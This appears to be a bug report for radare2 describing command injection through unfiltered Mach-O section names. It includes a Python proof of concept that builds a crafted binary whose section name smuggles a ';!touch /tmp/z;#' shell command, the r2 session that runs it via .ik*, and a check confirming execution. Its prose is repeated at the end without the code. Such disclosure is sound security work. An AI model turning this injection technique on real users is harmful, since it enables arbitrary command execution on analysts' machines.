Environment.
Sun Sep 27 20:58:01 IST 2026
radare2 6.2.3 +1 abi:146 @ linux-x86_64
commit: 853a94d0b56982b677e334e731e0dc2775a87746
options: gpl asan -O1 cs:5 cl:2 make
Linux x86_64
Description
Mach-O section names are copied into SDB keys without filtering. ik* then prints those keys as r2 commands:
r_cons_printf (core->cons, "pf.%s %s\n", flagname, v);
Because .ik* executes that output, a section name containing ;!command;
can execute a host command.
Opening the file alone does not trigger it. The user has to run .ik*.
Relevant code:
libr/bin/format/mach0/mach0.c:509-517
libr/core/cbin.c:182-190
Test
Generate a 185-byte Mach-O:
python3 - <<'PY'
import struct
payload = b";!touch /tmp/z;#"
header = struct.pack(
"<IiiIIIII",
0xfeedfacf, 0x01000007, 3, 2, 1, 152, 0, 0
)
segment = struct.pack(
"<II16sQQQQiiII",
0x19, 152, b"__TEXT\0".ljust(16, b"\0"),
0x100000000, 0x1000, 0, 185, 7, 5, 1, 0
)
section = struct.pack(
"<16s16sQQIIIIIIII",
b"__text\0".ljust(16, b"\0"), payload,
0x1000000b8, 1, 184, 0, 0, 0, 0x80000400, 0, 0, 0
)
open("muffin", "wb").write(header + segment + section + b"\xc3")
PY
rm -f /tmp/z
r2 -NN ./muffin
Inside r2:
[0x1000000b8]> ik*~touch
'@0x68'f mach0_section_;!touch /tmp/z;#___text
pf.mach0_section_;!touch /tmp/z;#___text mach0_section64
[0x1000000b8]> .ik*
[0x1000000b8]> q
Back in the shell:
test -e /tmp/z && echo worked!!
Output:
Environment.
Description
Mach-O section names are copied into SDB keys without filtering.
ik*then prints those keys as r2 commands:Because
.ik*executes that output, a section name containing;!command;can execute a host command.
Opening the file alone does not trigger it. The user has to run
.ik*.Relevant code:
libr/bin/format/mach0/mach0.c:509-517libr/core/cbin.c:182-190Test
Generate a 185-byte Mach-O:
Inside r2:
Back in the shell:
Output: